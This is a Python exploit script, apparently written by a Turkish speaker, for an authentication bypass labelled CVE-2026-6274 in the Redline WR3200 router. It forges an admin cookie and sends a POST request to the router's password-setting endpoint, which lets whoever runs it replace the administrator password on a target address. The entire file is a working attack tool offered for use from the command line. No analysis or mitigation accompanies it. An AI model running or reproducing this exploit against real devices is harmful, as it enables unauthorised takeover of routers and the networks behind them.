import requests import sys import argparse class Colors: OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' def banner(): print(f""" {Colors.BOLD}CVE-2026-6274 | Redline WR3200 Auth Bypass Exploit{Colors.ENDC} {Colors.WARNING}--------------------------------------------------{Colors.ENDC} """) class RedlineExploiter: def __init__(self, target_ip, new_password): self.target_ip = target_ip self.new_password = new_password self.url = f"http://{self.target_ip}/goform/set_manpwd" self.cookies = { "platform": "1", "user": "admin" } self.headers = { "X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Referer": f"http://{self.target_ip}/admin/more.html", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } def run(self): data = { "type": "setmanpwd", "routepwd": self.new_password } print(f"[*] Hedef: {self.target_ip}") print(f"[*] İşlem: Şifre değiştirme deneniyor...") try: response = requests.post( self.url, data=data, cookies=self.cookies, headers=self.headers, timeout=10 ) if response.status_code == 200: print(f"{Colors.OKGREEN}[+] Başarılı!{Colors.ENDC} Şifre '{self.new_password}' olarak güncellendi.") print(f"[>] Sunucu Yanıtı: {response.text}") else: print(f"{Colors.FAIL}[-] Hata!{Colors.ENDC} Sunucu {response.status_code} koduyla yanıt verdi.") except requests.exceptions.ConnectionError: print(f"{Colors.FAIL}[!] Hata:{Colors.ENDC} Hedef cihaza bağlanılamadı. IP adresini kontrol edin.") except Exception as e: print(f"{Colors.FAIL}[!] Beklenmedik bir hata oluştu:{Colors.ENDC} {e}") if __name__ == "__main__": banner() parser = argparse.ArgumentParser(description="Redline WR3200 Password Change Exploit") parser.add_argument("target", help="Hedef Modem IP Adresi (Örn: 192.168.1.1)") parser.add_argument("password", help="Atanacak Yeni Şifre") if len(sys.argv) == 1: parser.print_help() sys.exit(1) args = parser.parse_args() exploiter = RedlineExploiter(args.target, args.password) exploiter.run()